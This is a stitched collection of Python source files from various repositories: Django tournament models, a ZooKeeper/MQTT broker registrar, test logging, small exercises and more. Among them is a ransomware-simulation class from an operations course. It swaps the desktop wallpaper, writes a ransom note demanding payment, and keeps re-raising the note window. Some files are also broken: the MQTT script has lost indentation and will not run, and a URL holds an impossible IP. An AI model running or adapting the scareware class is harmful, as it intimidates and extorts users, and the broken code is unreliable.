        """Print a fixed sentence; returns None."""
        sentence = "I can speak"
        print(sentence)
# Calling the static method directly on a throwaway instance.
Human().speak()

me = Human()
me.speak()  # works fine: static methods are callable on instances too
# A @staticmethod receives no implicit self/cls argument; Python resolves the
# call through the class, so both Human.speak() and instance.speak() are
# valid -- no error occurs on the line above.
mqtt_broker/main.py | drtinao/KIV-DS-4HW | 0 | 12767402 | <reponame>drtinao/KIV-DS-4HW
from kazoo.client import KazooClient
import time
import sys
import logging
import socket # for working with network con
import subprocess
# constants - START
PARENT_NODE = "mqtt_brokers_list"             # zk parent node listing live brokers
NODE_NAME = "mqtt_node"                       # prefix for this broker's sequential child node
PARENT_NODE_MQTT_CLIENT = "mqtt_clients_list" # zk parent node listing connected clients
TIMEOUT_CON_ZOOKEEPER = 100000 # timeout within which connection to zookeeper should be established, seconds
# constants - END
# Returns hostname of the current machine.
def get_node_hostname():
    """Return this machine's hostname, or None (after logging) on failure."""
    try:
        return socket.gethostname()
    except OSError:
        # was a bare `except:`, which also swallowed SystemExit/KeyboardInterrupt
        print('Error while getting node hostname')
        sys.stdout.flush()
# Returns IP of the current machine.
# node_hostname - hostname of the machine
def get_node_ip(node_hostname):
try:
node_ip = socket.gethostbyname(node_hostname)
return node_ip
except:
print("Error while getting node IP")
sys.stdout.flush()
# connect to zookeeper server - START
logging.basicConfig()
zookeeper_servers = ['10.0.1.101:2181', '10.0.1.102:2181', '10.0.1.103:2181'] # IPs + ports of available zookeeper servers
kazooClient = KazooClient(hosts=zookeeper_servers)
kazooClient.start(timeout=TIMEOUT_CON_ZOOKEEPER)
# connect to zookeeper server - END
# create root node with brokers if not yet present - START
if not kazooClient.exists(PARENT_NODE):
kazooClient.create(PARENT_NODE, ephemeral=False, sequence=False)
print("BROKER CREATED PARENT ZOOKEEPER NODE WITH NAME: " + str(PARENT_NODE))
sys.stdout.flush()
# create root node with brokers if not yet present - END
# create root node with clients if not yet present - START
if not kazooClient.exists(PARENT_NODE_MQTT_CLIENT):
kazooClient.create(PARENT_NODE_MQTT_CLIENT, ephemeral=False, sequence=False)
print("BROKER CREATED PARENT ZOOKEEPER NODE WITH NAME: " + str(PARENT_NODE_MQTT_CLIENT))
sys.stdout.flush()
# create root node with clients if not yet present - END
# create children node for the broker with IP values
kazooClient.create(path=PARENT_NODE + '/' + NODE_NAME, value=get_node_ip(get_node_hostname()), ephemeral=True, sequence=True)
print("BROKER CREATED EPHEMERAL ZOOKEEPER NODE: " + str(PARENT_NODE) + str('/') + str(NODE_NAME))
# keep process up to let zookeeper know...
while True:
p = subprocess.Popen(["/bin/bash", "-c", "pgrep mosquitto"], stdout=subprocess.PIPE)
result = p.communicate()[0]
if len(result) == 0: # exit if mosquitto is down...
exit()
time.sleep(5) | 2.3125 | 2 |
test/functional/test-framework/log/base_log.py | josehu07/open-cas-linux-mf | 2 | 12767403 | <gh_stars>1-10
#
# Copyright(c) 2019-2020 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause-Clear
#
from enum import Enum
from re import sub
class BaseLogResult(Enum):
    # Result severities in ascending order of badness.  BaseLog relies on
    # these numeric values to keep only the worst result observed.
    DEBUG = 10
    PASSED = 11
    WORKAROUND = 12
    WARNING = 13
    SKIPPED = 14
    FAILED = 15
    EXCEPTION = 16
    BLOCKED = 17
    CRITICAL = 18
def escape(msg):
    """Strip characters that are not valid XML 1.0 text from *msg*."""
    valid_ranges = (u'\u0020-\uD7FF'
                    u'\u0009\u000A\u000D'
                    u'\uE000-\uFFFD'
                    u'\U00010000-\U0010FFFF')
    return sub(u'[^' + valid_ranges + u']+', '', msg)
class BaseLog():
    """Tracks the worst BaseLogResult seen across a sequence of log calls.

    Subclasses override the message hooks (begin, debug, info, ...) to emit
    output; this base class only aggregates severity.  Usable as a context
    manager: entering calls begin(), exiting calls end().
    """

    def __init__(self, begin_message=None):
        self.__begin_msg = begin_message
        self.__result = BaseLogResult.PASSED

    def __enter__(self):
        if self.__begin_msg is not None:
            self.begin(self.__begin_msg)
        else:
            self.begin("Start BaseLog ...")
        # BUG FIX: the original returned None here, so
        # `with BaseLog() as log:` bound `log` to None.
        return self

    def __exit__(self, *args):
        self.end()

    def __try_to_set_new_result(self, new_result):
        # severity is monotonic: only escalate, never downgrade
        if new_result.value > self.__result.value:
            self.__result = new_result

    def begin(self, message):
        pass

    def debug(self, message):
        pass

    def info(self, message):
        pass

    def workaround(self, message):
        self.__try_to_set_new_result(BaseLogResult.WORKAROUND)

    def warning(self, message):
        self.__try_to_set_new_result(BaseLogResult.WARNING)

    def skip(self, message):
        self.__try_to_set_new_result(BaseLogResult.SKIPPED)

    def error(self, message):
        self.__try_to_set_new_result(BaseLogResult.FAILED)

    def blocked(self, message):
        self.__try_to_set_new_result(BaseLogResult.BLOCKED)

    def exception(self, message):
        self.__try_to_set_new_result(BaseLogResult.EXCEPTION)

    def critical(self, message):
        self.__try_to_set_new_result(BaseLogResult.CRITICAL)

    def end(self):
        """Finish logging; returns the aggregated result."""
        return self.__result

    def get_result(self):
        return self.__result
| 2.109375 | 2 |
aktools/api_debug/local_debug.py | xiaoguangge/aktools | 1 | 12767404 | # -*- coding:utf-8 -*-
# /usr/bin/env python
"""
Date: 2021/12/9 19:09
Desc: HTTP 测试
"""
import requests
import pandas as pd
# Hit the locally running aktools HTTP wrapper for the EastMoney HK financial
# indicator endpoint and print the result as a DataFrame.
# NOTE(review): "1172.16.17.32" is not a valid IPv4 address (first octet > 255)
# -- presumably an anonymized placeholder for a LAN host; verify before use.
url = "http://1172.16.17.32:8080/api/stock_financial_hk_analysis_indicator_em"
params = {
    "stock": "00700",
    "indicator": "年度"
}
r = requests.get(url, params=params)
temp_df = pd.DataFrame.from_dict(r.json())
print(temp_df)
| 3.375 | 3 |
aula7_classes_calculadora2.py | clovisdanielcosta/dio-python | 0 | 12767405 | # Sem passar valores pelo init
class Calculadora:
# def __init__(self):
# pass
def soma(self, valor_a, valor_b):
return valor_a + valor_b
def subtracao(self, valor_a, valor_b):
return valor_a - valor_b
def multiplicacao(self, valor_a, valor_b):
return valor_a * valor_b
def divisao(self, valor_a, valor_b):
return valor_a / valor_b
if __name__ == '__main__':
    # Instantiate the class and exercise each of the four operations.
    calculadora = Calculadora()
    print(calculadora.soma(10, 2))
    print(calculadora.subtracao(10, 2))
    print(calculadora.multiplicacao(10, 2))
    print(calculadora.divisao(10, 2))
skeleton/models.py | l99fiamingo/ioniCup | 1 | 12767406 | from django.db import models
from django.core.validators import MinValueValidator, MaxValueValidator
from django.template.defaultfilters import slugify
# Create your models here.
class Tournament(models.Model):
    """One edition of the tournament; `active` flags the current edition."""
    year = models.CharField(max_length=99)
    title = models.CharField(max_length=99, blank=True)
    slug = models.SlugField(blank=True)
    active = models.BooleanField(default=False)
    def save(self, *args, **kwargs):
        # The slug is regenerated from year + title on every save.
        self.slug = slugify(self.year + ' ' + self.title)
        super(Tournament, self).save(*args, **kwargs)
    def __str__(self):
        return self.year
class Team(models.Model):
    """A team registered in a tournament edition."""
    # (value stored in DB, Italian display label). NOTE(review): the leading
    # space in ' Verde Lime' looks like a typo but is preserved, since it is
    # runtime data that may already exist in the database.
    COLORS = (
        ('Black', 'Nero'),
        ('Silver', 'Argento'),
        ('Gray', 'Grigio'),
        ('White', 'Bianco'),
        ('Maroon', 'Amaranto'),
        ('Red', 'Rosso'),
        ('Orange', 'Arancione'),
        ('Purple', 'Viola'),
        ('Fuchsia', 'Fucsia'),
        ('Green', 'Verde Scuro'),
        ('Lime', ' Verde Lime'),
        ('Yellow', 'Giallo'),
        ('Navy', 'Blue Navy'),
        ('Blue', 'Blu'),
        ('Teal', 'Verde Acqua'),
        ('Azure', 'Azzurro'),
        ('Pink', 'Rosa'))
    tournament = models.ForeignKey(Tournament, on_delete=models.CASCADE, null=True, related_name='teams')
    name = models.CharField(max_length=999)
    short_name = models.CharField(max_length=12, blank=True)
    city = models.CharField(max_length=36, blank=True)
    slug = models.SlugField(blank=True)
    color = models.CharField(max_length=16, choices=COLORS, default='White', blank=True)
    def save(self, *args, **kwargs):
        # Slug comes from the raw name; the stored text fields are title-cased.
        self.slug = slugify(self.name)
        self.name = self.name.title()
        self.short_name = self.short_name.title()
        self.city = self.city.title()
        super(Team, self).save(*args, **kwargs)
    def __str__(self):
        return self.name
class AllStarGame(models.Model):
    """A skills/all-star event players can be assigned to."""
    name = models.CharField(max_length=16)
    rules = models.CharField(max_length=999, blank=True)
    slug = models.SlugField(blank=True)
    def save(self, *args, **kwargs):
        self.slug = slugify(self.name)
        super(AllStarGame, self).save(*args, **kwargs)
    def __str__(self):
        return self.name
class Human(models.Model):
    """Common base for people (players, coaches): name, jersey size, slug."""
    SHIRT_SIZES = (('XXS', 'XXS'), ('XS', 'XS'), ('S', 'S'), ('M', 'M'), ('L', 'L'), ('XL', 'XL'), ('XXL', 'XXL'))
    first_name = models.CharField(max_length=16)
    last_name = models.CharField(max_length=16)
    jersey_size = models.CharField(max_length=4, choices=SHIRT_SIZES, blank=True)
    slug = models.SlugField(blank=True)
    def save(self, *args, **kwargs):
        # Slug is built from the raw names; names themselves are title-cased.
        self.slug = slugify(self.first_name + ' ' + self.last_name)
        self.first_name = self.first_name.title()
        self.last_name = self.last_name.title()
        super(Human, self).save(*args, **kwargs)
    def __str__(self):
        return self.first_name + ' ' + self.last_name
class Player(Human):
    """A rostered player; optionally assigned to an all-star event."""
    team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name='players')
    year_of_birth = models.IntegerField(validators=[MinValueValidator(1900), MaxValueValidator(2100)], blank=True, null=True)
    jersey_number = models.IntegerField(validators=[MinValueValidator(0), MaxValueValidator(999)], blank=True, null=True)
    all_star_game = models.ForeignKey(AllStarGame, on_delete=models.SET_NULL, blank=True, null=True, related_name='players')
class Coach(Human):
    """A team coach with optional contact details."""
    team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name='coaches')
    cell_number = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    email = models.EmailField(max_length=64, blank=True, null=True)
class Stage(models.Model): # Fase
    """A tournament phase; stages form a linked list via precedent_stage."""
    name = models.CharField(max_length=16, blank=True)
    tournament = models.ForeignKey(Tournament, on_delete=models.CASCADE, related_name='stages')
    precedent_stage = models.OneToOneField('self', on_delete=models.SET_NULL, blank=True, null=True, related_name='next_stage')
    protected = models.BooleanField(default=False)
    def __str__(self):
        return self.name
class Group(models.Model): # Girone
    """A pool/bracket inside a stage (round-robin or elimination)."""
    name = models.CharField(max_length=16, blank=True)
    FORMAT_TYPES = (('Round-Robin', "All'italiana"), ('Elimination', 'Ad eliminazione'))
    stage = models.ForeignKey(Stage, on_delete=models.CASCADE, related_name='groups')
    format = models.CharField(max_length=32, choices=FORMAT_TYPES, default='Round-Robin')
    number_of_teams = models.IntegerField(validators=[MinValueValidator(0)], default=0)
    importance = models.IntegerField(validators=[MinValueValidator(0)], default=0)
    def __str__(self):
        return self.name + ' - ' + self.stage.name
class Round(models.Model): # Giornata
    """A match day (numbered) within a group."""
    round = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    group = models.ForeignKey(Group, on_delete=models.CASCADE, related_name='rounds')
    def __str__(self):
        return str(self.round)
class Match(models.Model): # Partita
    """A single match; the sb_* fields back the live scoreboard state."""
    SIXTHS = (('1', 'Primo Tempo'), ('2', 'Secondo Tempo'), ('3', 'Terzo Tempo'), ('4', 'Quarto Tempo'), ('5', 'Quinto Tempo'), ('6', 'Sesto Tempo'), ('7', 'Supplementare'))
    COLORS = (
        ('Black', 'Nero'),
        ('Silver', 'Argento'),
        ('Gray', 'Grigio'),
        ('White', 'Bianco'),
        ('Maroon', 'Amaranto'),
        ('Red', 'Rosso'),
        ('Orange', 'Arancione'),
        ('Purple', 'Viola'),
        ('Fuchsia', 'Fucsia'),
        ('Green', 'Verde Scuro'),
        ('Lime', ' Verde Lime'),
        ('Yellow', 'Giallo'),
        ('Navy', 'Blue Navy'),
        ('Blue', 'Blu'),
        ('Teal', 'Verde Acqua'),
        ('Azure', 'Azzurro'),
        ('Pink', 'Rosa'))
    round = models.ForeignKey(Round, on_delete=models.CASCADE, blank=True, related_name='matches')
    team_A = models.ForeignKey(Team, on_delete=models.CASCADE, blank=True, null=True, related_name='matches_A')
    points_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    team_B = models.ForeignKey(Team, on_delete=models.CASCADE, blank=True, null=True, related_name='matches_B')
    points_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    time = models.ForeignKey('Time', on_delete=models.SET_NULL, blank=True, null=True, related_name='matches')
    court = models.ForeignKey('Court', on_delete=models.SET_NULL, blank=True, null=True, related_name='matches')
    number = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    # Live scoreboard state: current period, countdown timer and per-period partials.
    sb_current_sixth = models.CharField(max_length=16, choices=SIXTHS, blank=True)
    sb_timer = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_partial_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_partial_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_1_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_1_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_2_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_2_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_3_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_3_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_4_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_4_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_5_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_5_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_6_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_6_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_7_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_7_sixth_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
    sb_color_A = models.CharField(max_length=16, choices=COLORS, blank=True)
    sb_color_B = models.CharField(max_length=16, choices=COLORS, blank=True)
    def save(self, *args, **kwargs):
        # Default each scoreboard colour from the team's colour. The team FKs
        # are nullable, so guard against a missing team (bug fix: previously
        # raised AttributeError when team_A/team_B was None).
        if not self.sb_color_A and self.team_A is not None:
            self.sb_color_A = self.team_A.color
        if not self.sb_color_B and self.team_B is not None:
            self.sb_color_B = self.team_B.color
        super(Match, self).save(*args, **kwargs)
    def __str__(self):
        # Bug fix: compare against None instead of truthiness so a 0 score is
        # rendered as "0" rather than an empty string.
        ptA = str(self.points_A) if self.points_A is not None else ''
        ptB = str(self.points_B) if self.points_B is not None else ''
        return str(self.team_A) + ' ' + ptA + ' - ' + ptB + ' ' + str(self.team_B)
class Score(models.Model): # Punteggio
    """Standings row: a team's aggregate results within one group."""
    team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name='scores')
    group = models.ForeignKey(Group, on_delete=models.CASCADE, null=True, related_name='scores')
    score = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
    games_played = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
    wins = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
    losses = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
    points_made = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
    points_conceded = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
    goals_made = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
    goals_conceded = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True, default=0)
    def __str__(self):
        return str(self.group) + ': ' + str(self.team) + ' -> ' + str(self.score)
class Court(models.Model): # Campo
    """A playing court; `importance` orders courts for scheduling."""
    tournament = models.ForeignKey(Tournament, on_delete=models.CASCADE, null=True, related_name='courts')
    name = models.CharField(max_length=16, blank=True)
    importance = models.IntegerField(validators=[MinValueValidator(0)], blank=True, default=0)
    def __str__(self):
        return self.name
class Day(models.Model):
    """A calendar day of the tournament schedule."""
    tournament = models.ForeignKey(Tournament, on_delete=models.CASCADE, null=True, related_name='days')
    name = models.CharField(max_length=16)
    def __str__(self):
        return self.name
class Time(models.Model):
    """A time slot within a day; slots form a linked list via precedent_time."""
    day = models.ForeignKey(Day, on_delete=models.CASCADE, null=True, related_name='times')
    time = models.CharField(max_length=16, blank=True)
    event = models.CharField(max_length=32, blank=True) # se non ci sono partite
    precedent_time = models.OneToOneField('self', on_delete=models.SET_NULL, blank=True, null=True, related_name='next_time')
    initial = models.BooleanField(default=False)
    def __str__(self):
        return self.time
| 2.296875 | 2 |
tests/test_functions.py | rtidatascience/django-postgres-power | 16 | 12767407 | <reponame>rtidatascience/django-postgres-power
from django.test import TestCase
from datetime import datetime
from postgres_stats import DateTrunc, Extract
from .models import Checkin
class TestFunctions(TestCase):
    """Tests for the DateTrunc / Extract Postgres annotation functions."""
    def test_date_trunc(self):
        # Truncating to 'day' zeroes the time; to 'hour' zeroes minutes/seconds.
        _checkin = Checkin.objects.create(logged_at='2015-11-01 11:14:01')
        checkin = Checkin.objects. \
            annotate(day=DateTrunc('logged_at', 'day'),
                     hour=DateTrunc('logged_at', 'hour')). \
            get(pk=_checkin.pk)
        assert checkin.day == datetime(2015, 11, 1, 0, 0, 0)
        assert checkin.hour == datetime(2015, 11, 1, 11, 0, 0)
    def test_extract(self):
        # NOTE(review): the annotation named `hour` actually extracts the
        # *second* component (asserted == 2 below) -- misleading local name.
        _checkin = Checkin.objects.create(logged_at='2015-11-03 11:45:02')
        checkin = Checkin.objects. \
            annotate(day=Extract('logged_at', 'day'),
                     hour=Extract('logged_at', 'second'),
                     quarter=Extract('logged_at', 'quarter')). \
            get(pk=_checkin.pk)
        assert checkin.day == 3
        assert checkin.hour == 2
        assert checkin.quarter == 4
| 2.40625 | 2 |
suvec/vk_api_impl/session/records_managing/records.py | ProtsenkoAI/skady-user-vectorizer | 1 | 12767408 | <reponame>ProtsenkoAI/skady-user-vectorizer
import time
from typing import Optional, List
from abc import abstractmethod, ABC
from .session_types import Proxy, Credentials
from .consts import ResourceStatus, RESOURCE_OK_STATUS
class Record(ABC):
    """Base record tracking the health status of one external resource.

    Holds the resource id, its current status and the timestamp of the last
    status change; concrete subclasses define what "same resource" means.
    """
    def __init__(self, obj_id: int, status: ResourceStatus = RESOURCE_OK_STATUS,
                 status_change_time: Optional[float] = None):
        # Default the change timestamp to "now". (Annotation fixed: time.time()
        # returns a float, not an int.)
        if status_change_time is None:
            status_change_time = time.time()
        self.obj_id = obj_id
        self._status = status
        self.status_change_time = status_change_time
    @property
    def status(self):
        return self._status
    @status.setter
    def status(self, status):
        # Every status change also refreshes the change timestamp.
        self.status_change_time = time.time()
        self._status = status
    @property
    def time_since_status_change(self):
        """Seconds elapsed since the last status change."""
        return time.time() - self.status_change_time
    def is_in(self, records: List) -> bool:
        """Return True if any record in `records` represents the same resource."""
        return any(self.check_same(record) for record in records)
    def __repr__(self):
        return f"record_id: {self.obj_id}, status: {self.status}"
    @abstractmethod
    def check_same(self, record):
        """Check that both records represent same resource (for example, same proxy address)"""
        ...
class ProxyRecord(Record):
    """Record identified by a proxy address."""
    def __init__(self, *args, proxy: Proxy, **kwargs):
        self.proxy = proxy
        super().__init__(*args, **kwargs)
    def check_same(self, record):
        # Two records are "the same" when they wrap an equal proxy.
        return self.proxy == record.proxy
    def __repr__(self):
        return f"{self.proxy}, {super().__repr__()}"
class CredsRecord(Record):
    """Record identified by a credentials pair."""
    def __init__(self, *args, creds: Credentials, **kwargs):
        self.creds = creds
        super().__init__(*args, **kwargs)
    def check_same(self, record):
        # Two records are "the same" when they wrap equal credentials.
        return self.creds == record.creds
    def __repr__(self):
        return f"{self.creds}, {super().__repr__()}"
| 2.34375 | 2 |
python_07_function/music.py | lexiaoyuan/PythonCrashCourse | 0 | 12767409 | <reponame>lexiaoyuan/PythonCrashCourse
def make_album(singer, album, numbers=''):
    """Return a dict describing an album.

    The track count is included under 'numbers' only when a truthy value
    is supplied.
    """
    album_info = {'singer': singer, 'album': album}
    if numbers:
        album_info['numbers'] = numbers
    return album_info
# Demonstrate the three calling styles (with and without a track count).
print(make_album('张靓颖', '终于等到你'))
print(make_album('邓丽君', '我只在乎你', 20))
print(make_album('汪小敏', '笑看风云'))
# Interactive loop: prompt for singer and album until either input is empty.
while True:
    singer = input("请输入歌手:")
    if not singer:
        break
    album = input("请输入专辑:")
    if not album:
        break
    print(make_album(singer, album))
| 3.859375 | 4 |
setup.py | akrk1986/re-wx | 0 | 12767410 | <gh_stars>0
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="re-wx",
version="0.0.1",
author="<NAME>",
author_email="<EMAIL>",
description="A library for building modern declarative desktop applications in WX",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/chriskiehl/re-wx",
include_package_data=True,
data_files=[('rewx', ['rewx/icon.png'])],
install_requires=['wxpython>=4.1.0'],
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: Microsoft :: Windows",
"Operating System :: MacOS",
"Operating System :: POSIX :: Linux",
"Intended Audience :: End Users/Desktop",
"Topic :: Software Development :: User Interfaces"
],
python_requires='>=3.6',
) | 1.492188 | 1 |
ops_challenge/ops_challenge05/classes/malware.py | jinwoov/Ops401 | 0 | 12767411 | <filename>ops_challenge/ops_challenge05/classes/malware.py<gh_stars>0
import os, ctypes, urllib.request, datetime, subprocess, time, win32gui
from .helper_method import *
class Malware:
    """Ransomware *simulation* from a security-operations course exercise.

    WARNING: this intentionally mimics malicious behaviour (wallpaper change,
    ransom note, window pinning) for training purposes. Run ONLY inside an
    isolated lab VM; never on a production or personal machine.
    Windows-only (ctypes/windll, notepad.exe, win32gui).
    """
    def __init__(self):
        # Resolve the current user's home and Desktop path.
        self.user_name = os.path.expanduser("~")
        self.ab_path = f"{self.user_name}/Desktop/"
    def change_desktop_wallpaper(self):
        """Download an image to the Desktop and set it as the wallpaper."""
        image_url = "https://pm1.narvii.com/7277/cad40d74ff7b2a772ad6340c3d6d28eb2ce2b7d9r1-1080-848v2_hq.jpg"
        passage = f'{self.ab_path}malware.jpg'
        urllib.request.urlretrieve(image_url, passage)
        # 20 == SPI_SETDESKWALLPAPER (SystemParametersInfo action code).
        set_desktop_wallpaper = 20
        ctypes.windll.user32.SystemParametersInfoW(set_desktop_wallpaper, 0, passage, 0)
        animated_marker()
    def you_sure(self):
        """Interactive confirmation; returns True on 'y' (None otherwise)."""
        answer = input("You sure you want to continue? (y/n)")
        if(answer.lower() == "y"):
            return True
    def ransom_note(self):
        """Write the (simulated) ransom note to the Desktop."""
        note_path = f'{self.ab_path}/RANSOM_NOTE.txt'
        date = datetime.date.today().strftime('%d-%B-%Y')
        with open(note_path, 'w') as f:
            f.write(f'''
            {date}
            The harddisks of your computer have been encrypted with an Military grade encryption algorithm.
            There is no way to restore your data without a special key.
            Only we can decrypt your files!
            To purchase your key and restore your data, please follow these three easy steps:
            1. Email the file called EMAIL_ME.txt at {self.user_name}/Desktop/EMAIL_ME.txt to <EMAIL>
            2. You will receive your personal BTC address for payment.
            Once payment has been completed, send another email to <EMAIL> stating "PAID".
            We will check to see if payment has been paid.
            3. You will receive a text file with your KEY that will unlock all your files.
            IMPORTANT: To decrypt your files, place text file on desktop and wait. Shortly after it will begin to decrypt all files.
            WARNING:
            Do NOT attempt to decrypt your files with any software as it is obsolete and will not work, and may cost you more to unlock your files.
            Do NOT change file names, mess with the files, or run deccryption software as it will cost you more to unlock your files-
            -and there is a high chance you will lose your files forever.
            Do NOT send "PAID" button without paying, price WILL go up for disobedience.
            Do NOT think that we wont delete your files altogether and throw away the key if you refuse to pay. WE WILL.
            ''')
    def show_ransom_note(self):
        """Open the note in Notepad and keep re-raising it to the foreground.

        Loops five 10-second cycles; if Notepad loses focus, the process is
        killed and relaunched so the note stays on top.
        """
        note_path = f'{self.ab_path}/RANSOM_NOTE.txt'
        # Open the ransom note
        ransom = subprocess.Popen(['notepad.exe', note_path])
        count = 0 # Debugging/Testing
        while True:
            time.sleep(0.1)
            top_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
            if top_window == 'RANSOM_NOTE - Notepad':
                print('Ransom note is the top window - do nothing') # Debugging/Testing
                pass
            else:
                print('Ransom note is not the top window - kill/create process again') # Debugging/Testing
                # Kill ransom note so we can open it again and make sure it is in the foreground (top of all windows)
                time.sleep(0.1)
                ransom.kill()
                # Open the ransom note
                time.sleep(0.1)
                ransom = subprocess.Popen(['notepad.exe', note_path])
            # sleep for 10 seconds
            time.sleep(10)
            count +=1
            if count == 5:
                break
vector_2d/__init__.py | betados/vector_2D | 3 | 12767412 | <reponame>betados/vector_2D<filename>vector_2d/__init__.py
# Package init: re-export the public vector API at package level.
from vector_2d.vector import *
from vector_2d.vectorPolar import *
# Explicit public surface for `from vector_2d import *`.
__all__ = ["vector", "vectorPolar", "VectorPolar", "Vector", "round_vector", "angle", "distance_point_line",
           "distance_point_segment"]
| 1.65625 | 2 |
restful_mys/controller/auth.py | YnkDK/restful-mys | 0 | 12767413 | <filename>restful_mys/controller/auth.py
import time
from flask.ext.restful import Resource, reqparse, abort
from flask import jsonify
from ..model.auth import Auth as Model
from restful_mys.controller.secure_resource import SecureResource
class Auth(Resource):
    """REST resource handling login (POST) and token validation (GET)."""
    def __init__(self):
        """
        Sets up request parser and model for authentication
        """
        super(Auth, self).__init__()
        self.request_parser = reqparse.RequestParser()
        self.model = Model()
    def get(self):
        """
        Checks if a token is valid.
        :return: OK if token was valid, Unauthorized if invalid or Request Timeout if expired
        """
        # NOTE(review): self.CONFIG is not defined on this class -- presumably
        # injected onto Resource subclasses at app setup; SecureResource
        # apparently performs the token check in its constructor. Confirm both.
        sr = SecureResource(self.CONFIG['SECRET_KEY'])
        return sr.jsonify({'message': 'OK'})
    def post(self):
        """
        A typical login scenario. If login/password combination is correct, a token is generated which would be a key
        for all SecureResources. If login/password combination is invalid then 'Unauthorized' is returned.
        :return:
        """
        self.request_parser.add_argument(
            name='login',
            required=True,
            type=str,
            help="Needs argument: 'login' - the user login"
        )
        self.request_parser.add_argument(
            name='password',
            required=True,
            type=str,
            help="Needs argument: 'password' - the <PASSWORD>"
        )
        self.request_parser.add_argument(
            name='expire',
            required=False,
            default=600,
            type=int,
            help="Argument: 'expire' - the time (seconds) the issued token should be valid. Default to 600 seconds."
        )
        args = self.request_parser.parse_args()
        # Check login and issue token
        login_id, token = self.model.validate_login(args['login'], args['password'], args['expire'])
        if login_id is None:
            # Unauthorized access
            abort(401)
        return jsonify({
            'message': 'OK',
            'token': token,
            'expires_at': int(time.time() + args['expire'])
        })
03/spiral_memory.py | redfast00/advent_of_code_2017 | 0 | 12767414 | <gh_stars>0
def get_level(cell):
    """Return the ring index containing `cell` in an Ulam spiral.

    Ring 0 is the single centre cell 1; ring i ends at cell (2*i+1)**2.
    """
    i = 0
    while cell > (2 * i + 1) ** 2:
        i += 1
    return i


def find_coord(cell):
    """Return the (x, y) coordinate of `cell`, with cell 1 at the origin.

    Walks the cell's ring *backwards* from its largest cell, which sits at
    the bottom-right corner (level, -level).
    Bug fix: cell 1 previously fell through every loop and returned None.
    """
    if cell == 1:
        return (0, 0)
    level = get_level(cell)
    x = level
    y = -level
    current = (2 * level + 1) ** 2  # largest cell of this ring
    # Bottom edge, right to left.
    while x != -level:
        if current == cell:
            return (x, y)
        x -= 1
        current -= 1
    # Left edge, bottom to top.
    while y != level:
        if current == cell:
            return (x, y)
        y += 1
        current -= 1
    # Top edge, left to right.
    while x != level:
        if current == cell:
            return (x, y)
        x += 1
        current -= 1
    # Right edge, top to bottom.
    while y != -level:
        if current == cell:
            return (x, y)
        y -= 1
        current -= 1
    return None
print(find_coord(347991))
| 3.453125 | 3 |
runoob/basic_tutorial/for.py | zeroonegit/python | 1 | 12767415 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Filename: for.py
edibles = ['ham', 'spam', 'eggs', 'nuts']
# Tutorial: demonstrates the for/else construct -- the `else` branch runs
# only when the loop completes WITHOUT hitting `break`.
for food in edibles:
    if food == 'spam':
        print('No more spam please!')
        break
    print('Great, delicious ' + food)
else:
    # Skipped here, because 'spam' is in the list and triggers the break.
    print('I am so glad: No spam!')
print('Finally, I finished stuffing myself')
| 3.609375 | 4 |
abnormal/Address.py | 89berner/abnormal | 4 | 12767416 | import logging
import json
import re
import time
import os
import traceback
import sys
import Utils
import cv2
import hashlib
from BeautifulSoup import BeautifulSoup
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
#Reduce logging for selenium
from selenium.webdriver.remote.remote_connection import LOGGER
LOGGER.setLevel(logging.WARNING)
class Address:
def __init__(self, url, observer, options):
self.url = url
self.observer = observer
self.options = options
self.vars = {} #Map of js variables and their values
self.links = {} #Map of the links and the amount of times they appear
self.image_filename = "" #Filename
self.image_hash = "" #Hash of the image
self.driver = self.get_driver()
def get_url(self,url):
proxies = {'http' : "http://%s" % self.observer.ip, 'https': "https://%s" % self.observer.ip}
if self.options.no_proxy:
proxies = {}
try:
